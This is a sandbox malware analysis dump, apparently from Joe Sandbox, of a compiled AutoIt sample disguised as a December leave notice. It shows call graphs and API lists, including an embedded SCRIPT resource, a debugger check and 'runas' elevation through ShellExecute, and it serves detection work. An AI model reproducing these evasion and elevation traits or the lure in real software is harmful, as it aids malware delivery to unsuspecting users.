__malloc_crt 95379->95406 95380 fa7d96 95404 fa821f 47 API calls 7 library calls 95380->95404 95383 fa7dbd 95386 fa7dd3 95383->95386 95387 fa7dc4 95383->95387 95384 fa7d9d 95405 fa1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95384->95405 95385->95342 95388 fa7cf4 __lock 46 API calls 95386->95388 95407 fa7c0e 47 API calls __getptd_noexit 95387->95407 95391 fa7dda 95388->95391 95393 fa7de9 InitializeCriticalSectionAndSpinCount 95391->95393 95394 fa7dfe 95391->95394 95392 fa7dc9 95392->95385 95395 fa7e04 95393->95395 95396 fa1c9d _free 46 API calls 95394->95396 95408 fa7e1a LeaveCriticalSection _doexit 95395->95408 95396->95395 95398->95342 95399->95342 95400->95337 95402->95373 95403->95380 95404->95384 95406->95383 95407->95392 95408->95385 95417 fb5bb1 95409->95417 95411 fb63e2 95411->95351 95412->95348 95413->95351 95414->95355 95415->95357 95416->95346 95418 fb5bbd __fcloseall 95417->95418 95419 fb5bcf 95418->95419 95422 fb5c06 95418->95422 95504 fa7c0e 47 API calls __getptd_noexit 95419->95504 95421 fb5bd4 95505 fa6e10 8 API calls strtoxl 95421->95505 95428 fb5c78 95422->95428 95425 fb5c23 95506 fb5c4c LeaveCriticalSection __unlock_fhandle 95425->95506 95427 fb5bde __fcloseall 95427->95411 95429 fb5c98 95428->95429 95430 fa273b __wsopen_helper 47 API calls 95429->95430 95433 fb5cb4 95430->95433 95431 fb5deb 95432 fa6e20 __invoke_watson 8 API calls 95431->95432 95434 fb63c8 95432->95434 95433->95431 95435 fb5cee 95433->95435 95446 fb5d11 95433->95446 95436 fb5bb1 __wsopen_helper 104 API calls 95434->95436 95437 fa7bda __set_osfhnd 47 API calls 95435->95437 95438 fb63e2 95436->95438 95439 fb5cf3 95437->95439 95438->95425 95440 fa7c0e strtoxl 47 API calls 95439->95440 95441 fb5d00 95440->95441 95443 fa6e10 strtoxl 8 API calls 95441->95443 95442 fb5dcf 95444 fa7bda __set_osfhnd 47 API calls 95442->95444 95445 fb5d0a 95443->95445 95447 fb5dd4 95444->95447 95445->95425 95446->95442 95450 fb5dad 95446->95450 95448 fa7c0e strtoxl 47 API calls 
95447->95448 95449 fb5de1 95448->95449 95451 fa6e10 strtoxl 8 API calls 95449->95451 95452 faa979 __wsopen_helper 52 API calls 95450->95452 95451->95431 95453 fb5e7b 95452->95453 95454 fb5ea6 95453->95454 95455 fb5e85 95453->95455 95457 fb5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95454->95457 95456 fa7bda __set_osfhnd 47 API calls 95455->95456 95458 fb5e8a 95456->95458 95468 fb5ec8 95457->95468 95459 fa7c0e strtoxl 47 API calls 95458->95459 95461 fb5e94 95459->95461 95460 fb5f46 GetFileType 95462 fb5f93 95460->95462 95463 fb5f51 GetLastError 95460->95463 95466 fa7c0e strtoxl 47 API calls 95461->95466 95473 faac0b __set_osfhnd 48 API calls 95462->95473 95467 fa7bed __dosmaperr 47 API calls 95463->95467 95464 fb5f14 GetLastError 95465 fa7bed __dosmaperr 47 API calls 95464->95465 95470 fb5f39 95465->95470 95466->95445 95471 fb5f78 CloseHandle 95467->95471 95468->95460 95468->95464 95469 fb5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95468->95469 95472 fb5f09 95469->95472 95475 fa7c0e strtoxl 47 API calls 95470->95475 95471->95470 95474 fb5f86 95471->95474 95472->95460 95472->95464 95479 fb5fb1 95473->95479 95476 fa7c0e strtoxl 47 API calls 95474->95476 95475->95431 95477 fb5f8b 95476->95477 95477->95470 95478 fb616c 95478->95431 95481 fb633f CloseHandle 95478->95481 95479->95478 95480 faf82f __lseeki64_nolock 49 API calls 95479->95480 95496 fb6032 95479->95496 95482 fb601b 95480->95482 95483 fb5b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 95481->95483 95485 fa7bda __set_osfhnd 47 API calls 95482->95485 95501 fb603a 95482->95501 95484 fb6366 95483->95484 95486 fb636e GetLastError 95484->95486 95487 fb61f6 95484->95487 95485->95496 95488 fa7bed __dosmaperr 47 API calls 95486->95488 95487->95431 95489 fb637a 95488->95489 95493 faab1e __free_osfhnd 48 API calls 95489->95493 95490 faee0e 59 API calls __filbuf 95490->95501 95491 faea9c __close_nolock 50 API calls 95491->95501 95492 fb6f40 __chsize_nolock 81 API calls 
95492->95501 95493->95487 95494 faf82f 49 API calls __lseeki64_nolock 95494->95496 95495 faaf61 __flush 78 API calls 95495->95496 95496->95478 95496->95494 95496->95495 95496->95501 95497 fb61e9 95499 faea9c __close_nolock 50 API calls 95497->95499 95498 fb61d2 95498->95478 95500 fb61f0 95499->95500 95502 fa7c0e strtoxl 47 API calls 95500->95502 95501->95490 95501->95491 95501->95492 95501->95496 95501->95497 95501->95498 95503 faf82f 49 API calls __lseeki64_nolock 95501->95503 95502->95487 95503->95501 95504->95421 95505->95427 95506->95427 95511 f842f6 95507->95511 95510 f842cc LoadLibraryA GetProcAddress 95510->95267 95512 f842aa 95511->95512 95513 f842ff LoadLibraryA 95511->95513 95512->95267 95512->95510 95513->95512 95514 f84310 GetProcAddress 95513->95514 95514->95512 95516 f84085 FindResourceExW 95515->95516 95518 f840a2 95515->95518 95517 ff4f16 LoadResource 95516->95517 95516->95518 95517->95518 95519 ff4f2b SizeofResource 95517->95519 95518->95276 95519->95518 95520 ff4f3f LockResource 95519->95520 95520->95518 95522 f84526 95521->95522 95523 ff4fe0 95521->95523 95527 fa3a8d 95522->95527 95525 f84534 95525->95289 95526->95276 95531 fa3a99 __fcloseall 95527->95531 95528 fa3aa7 95540 fa7c0e 47 API calls __getptd_noexit 95528->95540 95530 fa3acd 95542 fa4e1c 95530->95542 95531->95528 95531->95530 95532 fa3aac 95541 fa6e10 8 API calls strtoxl 95532->95541 95537 fa3ae2 95549 fa3b04 LeaveCriticalSection LeaveCriticalSection _fprintf 95537->95549 95539 fa3ab7 __fcloseall 95539->95525 95540->95532 95541->95539 95543 fa4e4e EnterCriticalSection 95542->95543 95544 fa4e2c 95542->95544 95546 fa3ad3 95543->95546 95544->95543 95545 fa4e34 95544->95545 95547 fa7cf4 __lock 47 API calls 95545->95547 95548 fa39fe 81 API calls 4 library calls 95546->95548 95547->95546 95548->95537 95549->95539 95553 fa3839 95550->95553 95552 f84510 95552->95295 95554 fa3845 __fcloseall 95553->95554 95555 fa3880 __fcloseall 95554->95555 95556 fa385b _memset 95554->95556 95557 fa3888 
95554->95557 95555->95552 95566 fa7c0e 47 API calls __getptd_noexit 95556->95566 95558 fa4e1c __lock_file 48 API calls 95557->95558 95560 fa388e 95558->95560 95568 fa365b 62 API calls 5 library calls 95560->95568 95561 fa3875 95567 fa6e10 8 API calls strtoxl 95561->95567 95564 fa38a4 95569 fa38c2 LeaveCriticalSection LeaveCriticalSection _fprintf 95564->95569 95566->95561 95567->95555 95568->95564 95569->95555 95573 fa344a GetSystemTimeAsFileTime 95570->95573 95572 fcbdc3 95572->95297 95574 fa3478 __aulldiv 95573->95574 95574->95572 95576 fa3e71 __fcloseall 95575->95576 95577 fa3e7f 95576->95577 95578 fa3e94 95576->95578 95589 fa7c0e 47 API calls __getptd_noexit 95577->95589 95580 fa4e1c __lock_file 48 API calls 95578->95580 95582 fa3e9a 95580->95582 95581 fa3e84 95590 fa6e10 8 API calls strtoxl 95581->95590 95591 fa3b0c 55 API calls 5 library calls 95582->95591 95585 fa3ea5 95592 fa3ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 95585->95592 95587 fa3eb7 95588 fa3e8f __fcloseall 95587->95588 95588->95302 95589->95581 95590->95588 95591->95585 95592->95587 95594 fa1e61 95593->95594 95598 fa1e55 95593->95598 95617 fa7c0e 47 API calls __getptd_noexit 95594->95617 95596 fa2019 95601 fa1e41 95596->95601 95618 fa6e10 8 API calls strtoxl 95596->95618 95598->95594 95606 fa1ed4 95598->95606 95612 fa9d6b 47 API calls strtoxl 95598->95612 95600 fa1fa0 95600->95594 95600->95601 95603 fa1fb0 95600->95603 95601->95131 95602 fa1f5f 95602->95594 95604 fa1f7b 95602->95604 95614 fa9d6b 47 API calls strtoxl 95602->95614 95616 fa9d6b 47 API calls strtoxl 95603->95616 95604->95594 95604->95601 95608 fa1f91 95604->95608 95606->95594 95611 fa1f41 95606->95611 95613 fa9d6b 47 API calls strtoxl 95606->95613 95615 fa9d6b 47 API calls strtoxl 95608->95615 95611->95600 95611->95602 95612->95606 95613->95611 95614->95604 95615->95601 95616->95601 95617->95596 95618->95601 95619->95233 95621 fa2aba __fcloseall 95620->95621 95622 fa2aec 95621->95622 95623 fa2ad4 95621->95623 95624 
fa2ae4 __fcloseall 95621->95624 95625 fa4e1c __lock_file 48 API calls 95622->95625 95698 fa7c0e 47 API calls __getptd_noexit 95623->95698 95624->95245 95627 fa2af2 95625->95627 95686 fa2957 95627->95686 95628 fa2ad9 95699 fa6e10 8 API calls strtoxl 95628->95699 95634 fa35f0 __fcloseall 95633->95634 95635 fa361c 95634->95635 95636 fa3604 95634->95636 95638 fa4e1c __lock_file 48 API calls 95635->95638 95642 fa3614 __fcloseall 95635->95642 95876 fa7c0e 47 API calls __getptd_noexit 95636->95876 95640 fa362e 95638->95640 95639 fa3609 95877 fa6e10 8 API calls strtoxl 95639->95877 95860 fa3578 95640->95860 95642->95237 95647 fcc6ff SetFileTime CloseHandle 95646->95647 95648 fcc715 95646->95648 95647->95648 95648->95213 95650 fcc581 __tzset_nolock _wcscmp 95649->95650 95651 f844ed 64 API calls 95650->95651 95652 fcc05f 95650->95652 95653 fcbf5a GetSystemTimeAsFileTime 95650->95653 95654 f84517 83 API calls 95650->95654 95651->95650 95652->95211 95652->95213 95653->95650 95654->95650 95656 fcb97e 95655->95656 95657 fcb970 95655->95657 95659 fcb9c3 95656->95659 95660 fa3499 117 API calls 95656->95660 95682 fcb987 95656->95682 95658 fa3499 117 API calls 95657->95658 95658->95656 95950 fcbbe8 64 API calls 3 library calls 95659->95950 95662 fcb9a8 95660->95662 95662->95659 95663 fcb9b1 95662->95663 95667 fa35e4 __fcloseall 83 API calls 95663->95667 95663->95682 95664 fcba07 95665 fcba2c 95664->95665 95666 fcba0b 95664->95666 95951 fcb7e5 47 API calls __malloc_crt 95665->95951 95669 fcba18 95666->95669 95671 fa35e4 __fcloseall 83 API calls 95666->95671 95667->95682 95674 fa35e4 __fcloseall 83 API calls 95669->95674 95669->95682 95670 fcba34 95672 fcba5a 95670->95672 95673 fcba3a 95670->95673 95671->95669 95952 fcba8a 90 API calls 95672->95952 95675 fcba47 95673->95675 95678 fa35e4 __fcloseall 83 API calls 95673->95678 95674->95682 95680 fa35e4 __fcloseall 83 API calls 95675->95680 95675->95682 95677 fcba61 95953 fcbb64 95677->95953 95678->95675 95680->95682 95682->95243 
95682->95250 95683 fcba75 95683->95682 95685 fa35e4 __fcloseall 83 API calls 95683->95685 95684 fa35e4 __fcloseall 83 API calls 95684->95683 95685->95682 95688 fa2966 95686->95688 95695 fa2984 95686->95695 95687 fa2974 95733 fa7c0e 47 API calls __getptd_noexit 95687->95733 95688->95687 95690 fa299c _memcpy_s 95688->95690 95688->95695 95690->95695 95701 fa2933 95690->95701 95708 faaf61 95690->95708 95735 fa2c84 95690->95735 95741 fa8e63 78 API calls 7 library calls 95690->95741 95691 fa2979 95734 fa6e10 8 API calls strtoxl 95691->95734 95700 fa2b24 LeaveCriticalSection LeaveCriticalSection _fprintf 95695->95700 95698->95628 95699->95624 95700->95624 95702 fa293d 95701->95702 95703 fa2952 95701->95703 95742 fa7c0e 47 API calls __getptd_noexit 95702->95742 95703->95690 95705 fa2942 95743 fa6e10 8 API calls strtoxl 95705->95743 95707 fa294d 95707->95690 95709 faaf6d __fcloseall 95708->95709 95710 faaf8d 95709->95710 95711 faaf75 95709->95711 95713 fab022 95710->95713 95718 faafbf 95710->95718 95817 fa7bda 47 API calls __getptd_noexit 95711->95817 95822 fa7bda 47 API calls __getptd_noexit 95713->95822 95714 faaf7a 95818 fa7c0e 47 API calls __getptd_noexit 95714->95818 95717 fab027 95823 fa7c0e 47 API calls __getptd_noexit 95717->95823 95744 faa8ed 95718->95744 95721 fab02f 95824 fa6e10 8 API calls strtoxl 95721->95824 95722 faafc5 95724 faafeb 95722->95724 95725 faafd8 95722->95725 95819 fa7c0e 47 API calls __getptd_noexit 95724->95819 95753 fab043 95725->95753 95726 faaf82 __fcloseall 95726->95690 95729 faafe4 95821 fab01a LeaveCriticalSection __unlock_fhandle 95729->95821 95730 faaff0 95820 fa7bda 47 API calls __getptd_noexit 95730->95820 95733->95691 95734->95695 95736 fa2cbb 95735->95736 95737 fa2c97 95735->95737 95736->95690 95737->95736 95738 fa2933 __fseek_nolock 47 API calls 95737->95738 95739 fa2cb4 95738->95739 95740 faaf61 __flush 78 API calls 95739->95740 95740->95736 95741->95690 95742->95705 95743->95707 95745 faa8f9 __fcloseall 95744->95745 95746 faa946 
EnterCriticalSection 95745->95746 95747 fa7cf4 __lock 47 API calls 95745->95747 95748 faa96c __fcloseall 95746->95748 95749 faa91d 95747->95749 95748->95722 95750 faa93a 95749->95750 95751 faa928 InitializeCriticalSectionAndSpinCount 95749->95751 95825 faa970 LeaveCriticalSection _doexit 95750->95825 95751->95750 95754 fab050 __ftell_nolock 95753->95754 95755 fab0ac 95754->95755 95756 fab08d 95754->95756 95785 fab082 95754->95785 95759 fab105 95755->95759 95760 fab0e9 95755->95760 95835 fa7bda 47 API calls __getptd_noexit 95756->95835 95764 fab11c 95759->95764 95841 faf82f 49 API calls 3 library calls 95759->95841 95838 fa7bda 47 API calls __getptd_noexit 95760->95838 95761 fab86b 95761->95729 95762 fab092 95836 fa7c0e 47 API calls __getptd_noexit 95762->95836 95826 fb3bf2 95764->95826 95767 fab0ee 95839 fa7c0e 47 API calls __getptd_noexit 95767->95839 95769 fab099 95837 fa6e10 8 API calls strtoxl 95769->95837 95770 fab12a 95773 fab44b 95770->95773 95842 fa7a0d 47 API calls 2 library calls 95770->95842 95775 fab7b8 WriteFile 95773->95775 95776 fab463 95773->95776 95774 fab0f5 95840 fa6e10 8 API calls strtoxl 95774->95840 95781 fab150 GetConsoleMode 95781->95773 95849 faa70c 95785->95849 95817->95714 95818->95726 95819->95730 95820->95729 95821->95726 95822->95717 95823->95721 95824->95726 95825->95746 95827 fb3c0a 95826->95827 95828 fb3bfd 95826->95828 95831 fb3c16 95827->95831 95857 fa7c0e 47 API calls __getptd_noexit 95827->95857 95856 fa7c0e 47 API calls __getptd_noexit 95828->95856 95830 fb3c02 95830->95770 95831->95770 95833 fb3c37 95858 fa6e10 8 API calls strtoxl 95833->95858 95835->95762 95836->95769 95837->95785 95838->95767 95839->95774 95840->95785 95841->95764 95842->95781 95850 faa716 IsProcessorFeaturePresent 95849->95850 95851 faa714 95849->95851 95853 fb37b0 95850->95853 95851->95761 95859 fb375f 5 API calls 2 library calls 95853->95859 95855 fb3893 95855->95761 95856->95830 95857->95833 95858->95830 95859->95855 95861 fa359b 95860->95861 95862 

Control-flow Graph
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7e6850cf813cb2f77cacad0a5e2d16c5f1f1dda778a5643a673997bf67fd897
                                                      • Instruction ID: 3cea8f90b48acffe618fe1b8871212c4111b89e2330c6b5de42331087d6282a8
                                                      • Opcode Fuzzy Hash: a7e6850cf813cb2f77cacad0a5e2d16c5f1f1dda778a5643a673997bf67fd897
                                                      • Instruction Fuzzy Hash: 0E325DB5E022288BCB25CF54DC816E9B7B5FF4A310F1841D9E40AA7A86D7349E81DF52

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00F83AA3,?), ref: 00F83D45
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00F83AA3,?), ref: 00F83D57
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,01041148,01041130,?,?,?,?,00F83AA3,?), ref: 00F83DC8
                                                        • Part of subcall function 00F86430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F83DEE,01041148,?,?,?,?,?,00F83AA3,?), ref: 00F86471
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00F83AA3,?), ref: 00F83E48
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010328F4,00000010), ref: 00FF1CCE
                                                      • SetCurrentDirectoryW.KERNEL32(?,01041148,?,?,?,?,?,00F83AA3,?), ref: 00FF1D06
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0101DAB4,01041148,?,?,?,?,?,00F83AA3,?), ref: 00FF1D89
                                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00F83AA3), ref: 00FF1D90
                                                        • Part of subcall function 00F83E6E: GetSysColorBrush.USER32(0000000F), ref: 00F83E79
                                                        • Part of subcall function 00F83E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00F83E88
                                                        • Part of subcall function 00F83E6E: LoadIconW.USER32(00000063), ref: 00F83E9E
                                                        • Part of subcall function 00F83E6E: LoadIconW.USER32(000000A4), ref: 00F83EB0
                                                        • Part of subcall function 00F83E6E: LoadIconW.USER32(000000A2), ref: 00F83EC2
                                                        • Part of subcall function 00F83E6E: RegisterClassExW.USER32(?), ref: 00F83F30
                                                        • Part of subcall function 00F836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F836E6
                                                        • Part of subcall function 00F836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83707
                                                        • Part of subcall function 00F836B8: ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F8371B
                                                        • Part of subcall function 00F836B8: ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F83724
                                                        • Part of subcall function 00F84FFC: _memset.LIBCMT ref: 00F85022
                                                        • Part of subcall function 00F84FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F850CB
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 00FF1CC8
                                                      • runas, xrefs: 00FF1D84
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 438480954-3287110873
                                                      • Opcode ID: e6341631d3e183218cda691bd54f93281d47476807ef6a8e64ef0fcaa534cd22
                                                      • Instruction ID: d058e690d029815853290491f6e5c45a3ef1427dd3bd4d5f55dc7ec48eb49f06
                                                      • Opcode Fuzzy Hash: e6341631d3e183218cda691bd54f93281d47476807ef6a8e64ef0fcaa534cd22
                                                      • Instruction Fuzzy Hash: E0516775E04248ABCF22BBF0DC85EED7B79AF04B00F004028F59166166DA7D6689EB30

                                                      Control-flow Graph

                                                      control_flow_graph 1075 f9ddc0-f9de4f call f8d7f7 GetVersionExW call f86a63 call f9dfb4 call f86571 1084 ff24c8-ff24cb 1075->1084 1085 f9de55-f9de56 1075->1085 1086 ff24cd 1084->1086 1087 ff24e4-ff24e8 1084->1087 1088 f9de58-f9de63 1085->1088 1089 f9de92-f9dea2 call f9df77 1085->1089 1091 ff24d0 1086->1091 1092 ff24ea-ff24f3 1087->1092 1093 ff24d3-ff24dc 1087->1093 1094 f9de69-f9de6b 1088->1094 1095 ff244e-ff2454 1088->1095 1104 f9dea4-f9dec1 GetCurrentProcess call f9df5f 1089->1104 1105 f9dec7-f9dee1 1089->1105 1091->1093 1092->1091 1099 ff24f5-ff24f8 1092->1099 1093->1087 1100 ff2469-ff2475 1094->1100 1101 f9de71-f9de74 1094->1101 1097 ff245e-ff2464 1095->1097 1098 ff2456-ff2459 1095->1098 1097->1089 1098->1089 1099->1093 1106 ff247f-ff2485 1100->1106 1107 ff2477-ff247a 1100->1107 1102 f9de7a-f9de89 1101->1102 1103 ff2495-ff2498 1101->1103 1108 ff248a-ff2490 1102->1108 1109 f9de8f 1102->1109 1103->1089 1110 ff249e-ff24b3 1103->1110 1104->1105 1127 f9dec3 1104->1127 1112 f9df31-f9df3b GetSystemInfo 1105->1112 1113 f9dee3-f9def7 call f9e00c 1105->1113 1106->1089 1107->1089 1108->1089 1109->1089 1114 ff24bd-ff24c3 1110->1114 1115 ff24b5-ff24b8 1110->1115 1117 f9df0e-f9df1a 1112->1117 1123 f9df29-f9df2f GetSystemInfo 1113->1123 1124 f9def9-f9df01 call f9dff4 GetNativeSystemInfo 1113->1124 1114->1089 1115->1089 1119 f9df1c-f9df1f FreeLibrary 1117->1119 1120 f9df21-f9df26 1117->1120 1119->1120 1126 f9df03-f9df07 1123->1126 1124->1126 1126->1117 1129 f9df09-f9df0c FreeLibrary 1126->1129 1127->1105 1129->1117
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00F9DDEC
                                                      • GetCurrentProcess.KERNEL32(00000000,0101DC38,?,?), ref: 00F9DEAC
                                                      • GetNativeSystemInfo.KERNELBASE(?,0101DC38,?,?), ref: 00F9DF01
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F9DF0C
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F9DF1F
                                                      • GetSystemInfo.KERNEL32(?,0101DC38,?,?), ref: 00F9DF29
                                                      • GetSystemInfo.KERNEL32(?,0101DC38,?,?), ref: 00F9DF35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                      • String ID:
                                                      • API String ID: 3851250370-0
                                                      • Opcode ID: 62ff2a320a1e682e9bebbfa3b5596f612c26f201baaa81ce0229c7518e926b4e
                                                      • Instruction ID: a03ee61ddc0fd8a770354f6097e89cfe1f89c65c73475132c040e2805c908c26
                                                      • Opcode Fuzzy Hash: 62ff2a320a1e682e9bebbfa3b5596f612c26f201baaa81ce0229c7518e926b4e
                                                      • Instruction Fuzzy Hash: A061C3B1C0A384DFDF15DFA898C11E97FB46F29304F2989D9D8459F20BC628C908DB65

                                                      Control-flow Graph

                                                      control_flow_graph 1147 f8406b-f84083 CreateStreamOnHGlobal 1148 f840a3-f840a6 1147->1148 1149 f84085-f8409c FindResourceExW 1147->1149 1150 ff4f16-ff4f25 LoadResource 1149->1150 1151 f840a2 1149->1151 1150->1151 1152 ff4f2b-ff4f39 SizeofResource 1150->1152 1151->1148 1152->1151 1153 ff4f3f-ff4f4a LockResource 1152->1153 1153->1151 1154 ff4f50-ff4f6e 1153->1154 1154->1151
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F8449E,?,?,00000000,00000001), ref: 00F8407B
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F8449E,?,?,00000000,00000001), ref: 00F84092
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00F8449E,?,?,00000000,00000001,?,?,?,?,?,?,00F841FB), ref: 00FF4F1A
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00F8449E,?,?,00000000,00000001,?,?,?,?,?,?,00F841FB), ref: 00FF4F2F
                                                      • LockResource.KERNEL32(00F8449E,?,?,00F8449E,?,?,00000000,00000001,?,?,?,?,?,?,00F841FB,00000000), ref: 00FF4F42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 28810d702ecce8a8a07d01928d53cb5b1bf018264eedd3555af8b8721149bdcc
                                                      • Instruction ID: 3f715181963548e18a9398ddea4f40f097f18423f4ccba292effb027491e8147
                                                      • Opcode Fuzzy Hash: 28810d702ecce8a8a07d01928d53cb5b1bf018264eedd3555af8b8721149bdcc
                                                      • Instruction Fuzzy Hash: 3D111871600701BFE7229BA5EC49F677BB9EBC5B61F10416CF64696294DA62EC009B30
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00FF2F49), ref: 00FC6CB9
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00FC6CCA
                                                      • FindClose.KERNEL32(00000000), ref: 00FC6CDA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 2e6acb9309971b940629d4f158c5e6ec56ee9d991a8e2118f4f400280039009d
                                                      • Instruction ID: f87eb8a0743d7ebc7edc4041cdc311ff3a863a6417b7e83d631b69bd6b4e37b3
                                                      • Opcode Fuzzy Hash: 2e6acb9309971b940629d4f158c5e6ec56ee9d991a8e2118f4f400280039009d
                                                      • Instruction Fuzzy Hash: 20E0D831814411678220A7B8ED0E9EA376CDE0533AF100719F8B1C11C0EB79D90057E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::exception::exception
                                                      • String ID: @
                                                      • API String ID: 3728558374-2766056989
